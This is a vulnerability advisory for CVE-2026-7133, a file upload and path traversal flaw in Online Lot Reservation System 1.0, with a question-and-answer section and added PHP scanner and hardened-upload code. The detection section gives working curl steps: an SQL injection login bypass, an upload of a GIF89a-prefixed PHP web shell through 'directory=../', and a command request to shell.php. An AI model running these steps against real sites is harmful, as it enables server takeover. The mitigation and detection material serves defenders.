CVE-2026-7133
Unrestricted File Upload in Online Lot Reservation System /activity.php
Publication date: 2026-04-27
Last updated on: 2026-04-29
Assigner: VulDB
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| code-projects | online_lot_reservation_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-434 | The product allows the upload or transfer of dangerous file types that are automatically processed within its environment. |
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
AI Powered Q&A
Can you explain this vulnerability to me?
The CVE-2026-7133 vulnerability affects the Online Lot Reservation System version 1.0, specifically in the file activity.php.
It combines an arbitrary file upload with a path traversal, giving remote code execution without administrator privileges.
The upload path is built by concatenating the user-supplied directory parameter without any sanitization, so ../ sequences in that parameter escape the intended upload directory.
The file type check relies on getimagesize(), which only parses image headers; prepending the GIF89a magic bytes to a PHP file is enough to satisfy it.
Attackers can upload malicious PHP files to arbitrary directories, including the web root, and execute arbitrary system commands remotely, potentially gaining full server control.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows a remote attacker who can reach the upload handler in activity.php to upload and execute arbitrary PHP code on the server, leading to full server compromise.
Such a compromise can result in unauthorized access to sensitive data, potential data breaches, and loss of data integrity and availability.
Consequently, this vulnerability could negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.
Organizations using the affected system may face increased risk of non-compliance due to potential exposure of protected data and failure to maintain adequate security controls.
How can this vulnerability impact me? :
This vulnerability allows a remote attacker who can reach activity.php to upload a PHP file into a directory of their choosing, including the web root, and then execute arbitrary system commands by requesting it.
The result is full server compromise: access to any data the web server can read, modification or deletion of files, and disruption of the service.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection is active: reproduce the upload against a test instance of Online Lot Reservation System 1.0 and check whether activity.php accepts a manipulated directory parameter and whether the stored file is then served and executed. Run these steps only against systems you are authorised to test.
Example commands (host and port are those of a local test instance):
- Obtain a session cookie. The walkthrough does this through an SQL injection in the login form, which is a weakness separate from the upload itself and only serves to get an authenticated session here: curl -X POST http://127.0.0.1:7777/onlinelot/loginuser.php -d "email=admin' OR '1'='1'-- -&password=test" -c cookies.txt
- Create the polyglot: a PHP web shell with the six bytes GIF89a prepended, so getimagesize() treats it as a GIF.
- Upload it with a traversal in the directory parameter so it lands in the web root under its original name. The upload form field name was mangled during extraction of this page and is shown as a placeholder: curl -X POST http://127.0.0.1:7777/onlinelot/activity.php -F "<field>=@shell.php" -F "directory=../" -F "date=2024-01-01" -F "id=1" -b cookies.txt
- Request the uploaded file to confirm it executes: curl "http://127.0.0.1:7777/onlinelot/shell.php?cmd=whoami"
- A passive check that needs no exploitation: scan the web root and upload directories for files that begin with GIF89a (or other image magic bytes) but contain a PHP open tag, and for any .php file that is not part of the installed application.
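The polyglot and the passive check from the list above, as an added example that is not code from the Online Lot Reservation System or from the advisory. The payload is a harmless echo rather than a command shell; the directory name and sample files are constructed for the demo. The script shows that both getimagesize() and finfo accept a GIF89a-prefixed PHP file, which is why a scanner has to look past the magic bytes:

```php
<?php
// Added example, not code from the Online Lot Reservation System or its advisory.
// Builds the GIF89a/PHP polyglot the walkthrough describes (harmless payload),
// shows why getimagesize() and libmagic accept it, and scans a directory for
// files that look like images but carry PHP.
declare(strict_types=1);

// "GIF89a" followed by PHP text. getimagesize() reads only the signature and a
// few header bytes, so the PHP text itself is consumed as width/height/flags.
function buildPolyglot(string $phpPayload = "<?php echo 'polyglot'; ?>"): string
{
    return 'GIF89a' . $phpPayload;
}

// The header-only check the vulnerable handler relies on.
function passesGetimagesize(string $path): bool
{
    return @getimagesize($path) !== false;
}

// finfo (libmagic) keys on the same signature and reports image/gif as well.
function sniffedMime(string $path): string
{
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    return $mime === false ? 'unknown' : $mime;
}

// Passive detection for an upload or web root directory: flag a file when it
// starts with image magic bytes but contains a PHP open tag, or when it has a
// PHP-executable extension at all (nothing in an upload directory should).
function findSuspiciousUploads(string $dir): array
{
    $magic = ["GIF87a", "GIF89a", "\xFF\xD8\xFF", "\x89PNG\r\n\x1A\n"];
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path = $file->getPathname();
        $head = (string) file_get_contents($path, false, null, 0, 65536);
        $looksLikeImage = false;
        foreach ($magic as $m) {
            if (strncmp($head, $m, strlen($m)) === 0) {
                $looksLikeImage = true;
                break;
            }
        }
        $hasPhpTag = stripos($head, '<?php') !== false || strpos($head, '<?=') !== false;
        $phpExtension = preg_match('/\.(php\d?|phtml|phar)$/i', $path) === 1;
        if (($looksLikeImage && $hasPhpTag) || $phpExtension) {
            $hits[] = $path;
        }
    }
    sort($hits);
    return $hits;
}

// Demo on constructed files in a temporary directory.
$dir = sys_get_temp_dir() . '/lot-upload-scan-' . bin2hex(random_bytes(4));
mkdir($dir);
// A genuine 1x1 transparent GIF for comparison.
file_put_contents("$dir/photo.gif", base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'));
file_put_contents("$dir/shell.php", buildPolyglot());   // name used in the walkthrough
file_put_contents("$dir/cover.gif", buildPolyglot());   // same bytes, image extension

foreach (['photo.gif', 'shell.php', 'cover.gif'] as $name) {
    printf("%-10s getimagesize: %-4s finfo: %s\n", $name,
        passesGetimagesize("$dir/$name") ? 'ok' : 'fail', sniffedMime("$dir/$name"));
}
print "flagged:\n";
foreach (findSuspiciousUploads($dir) as $hit) {
    print "  $hit\n";
}
array_map('unlink', glob("$dir/*"));
rmdir($dir);
```

All three files pass getimagesize() and are sniffed as image/gif; only the scan, which looks for a PHP open tag behind the image header and for PHP extensions, separates the two polyglots from the real image. Point findSuspiciousUploads() at the application's web root and upload directory to use it as the passive check.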
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation is to stop trusting the directory parameter: validate it against a fixed list and confine the resolved path to the upload base directory.
- Allow only predefined directories for uploads, for example by checking that the directory parameter matches an allowed list.
- Do not try to strip '../' from the parameter (a single pass over '....//' still leaves '../'); reject any value not in the allowlist, resolve the destination with realpath() and verify that it lies within the intended base upload directory.
- Enforce strict file type validation by allowing only specific image extensions such as jpg, jpeg, gif and png, matched on the lowercased final extension, and reject any name carrying an executable extension such as .php, .phtml or .phar.
- Verify MIME types with finfo_file() as a second check, but note that it keys on the same magic bytes as getimagesize(): a GIF89a-prefixed PHP file is reported as image/gif, so this check alone does not stop the polyglot described above.
- Rename uploaded files to server-generated unique filenames instead of keeping the original names, which prevents overwriting and removes predictable paths and attacker-chosen extensions.
- Configure the server so PHP is never executed from upload directories (Apache: php_flag engine off or RemoveHandler for .php in that directory; nginx: a location block denying *.php under the upload path and never routing it to php-fpm). With this in place an uploaded polyglot is served as inert bytes even if the other checks fail.
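The mitigation list above as one hardened upload routine, added here as an example and not taken from the project's source. The base path, the allowed subdirectory names, the form field handling and the sample inputs are assumptions for illustration; the pattern in the comment block is reconstructed from the advisory's description, not copied from activity.php:

```php
<?php
// Added example, not the project's code: a hardened version of the upload step
// the advisory describes. Base path, subdirectory names and inputs are assumed.
declare(strict_types=1);

define('UPLOAD_BASE', sys_get_temp_dir() . '/lot-uploads-demo'); // assumed base directory
const ALLOWED_DIRS = ['activities', 'lots'];                       // assumed subdirectories
const ALLOWED_TYPES = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                       'gif' => 'image/gif', 'png' => 'image/png'];

// Pattern described in the advisory (reconstructed, not the actual source):
//   $target = $uploadDir . $_POST['directory'] . '/' . $_FILES['f']['name'];
//   if (getimagesize($_FILES['f']['tmp_name'])) move_uploaded_file(..., $target);
// "directory=../" escapes the upload tree and a GIF89a prefix satisfies the check.

function storeUpload(string $tmpPath, string $clientName, string $directory): string
{
    // 1. Allowlist the directory parameter; do not try to strip "../" from it.
    if (!in_array($directory, ALLOWED_DIRS, true)) {
        throw new InvalidArgumentException("directory not allowed: $directory");
    }
    // 2. Resolve both paths and require the destination to sit under the base.
    $base = realpath(UPLOAD_BASE);
    $dest = realpath(UPLOAD_BASE . '/' . $directory);
    if ($base === false || $dest === false
        || strncmp($dest . '/', $base . '/', strlen($base) + 1) !== 0) {
        throw new RuntimeException('destination resolves outside the upload base');
    }
    // 3. Extension allowlist; the client name is used only to pick a type.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new InvalidArgumentException("extension not allowed: .$ext");
    }
    // 4. Sniffed content type must match the extension. Still a header check:
    //    a GIF89a-prefixed PHP file passes as image/gif. Steps 5 and 6 make
    //    that harmless.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new InvalidArgumentException("content is $mime, expected " . ALLOWED_TYPES[$ext]);
    }
    // 5. Server-generated random name; the client filename never reaches the disk.
    $target = $dest . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // In a request handler use is_uploaded_file($tmpPath) and move_uploaded_file();
    // rename() is used so this example runs from the CLI.
    if (!rename($tmpPath, $target)) {
        throw new RuntimeException('could not store file');
    }
    return $target;
}

// 6. Forbid PHP execution under the upload tree. This .htaccess only takes effect
//    when Apache allows overrides; otherwise put the same directives in the vhost.
//    On nginx deny "location ~ ^/uploads/.*\.php$" and never pass it to php-fpm.
function writeNoExecuteRule(): void
{
    file_put_contents(UPLOAD_BASE . '/.htaccess', "php_flag engine off\nRemoveHandler .php .phtml .phar\n");
}

// Demo with constructed inputs.
@mkdir(UPLOAD_BASE . '/activities', 0755, true);
@mkdir(UPLOAD_BASE . '/lots', 0755, true);
writeNoExecuteRule();
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7'); // real 1x1 GIF
$polyglot = "GIF89a<?php echo 'polyglot'; ?>";                                      // harmless stand-in
$cases = [
    ['photo.gif', 'activities', $gif],        // legitimate upload
    ['shell.php', '../',        $polyglot],   // the advisory's traversal attempt
    ['shell.php', 'activities', $polyglot],   // traversal blocked, extension still bad
    ['shell.gif', 'activities', $polyglot],   // passes finfo; stored under a random .gif name, not executable
];
foreach ($cases as [$name, $directory, $bytes]) {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, $bytes);
    try {
        printf("%-10s %-11s -> stored as %s\n", $name, $directory, basename(storeUpload($tmp, $name, $directory)));
    } catch (Exception $e) {
        printf("%-10s %-11s -> rejected: %s\n", $name, $directory, $e->getMessage());
        unlink($tmp);
    }
}
```

The fourth case is the one to understand: a polyglot named shell.gif passes every content check, so the controls that actually neutralise it are the random server-chosen name (the attacker cannot request shell.php because it was never written) and the no-execute rule on the upload tree. If GD is available, re-encoding the image with imagecreatefromstring() and imagegif() or imagepng() before storing it strips appended PHP entirely.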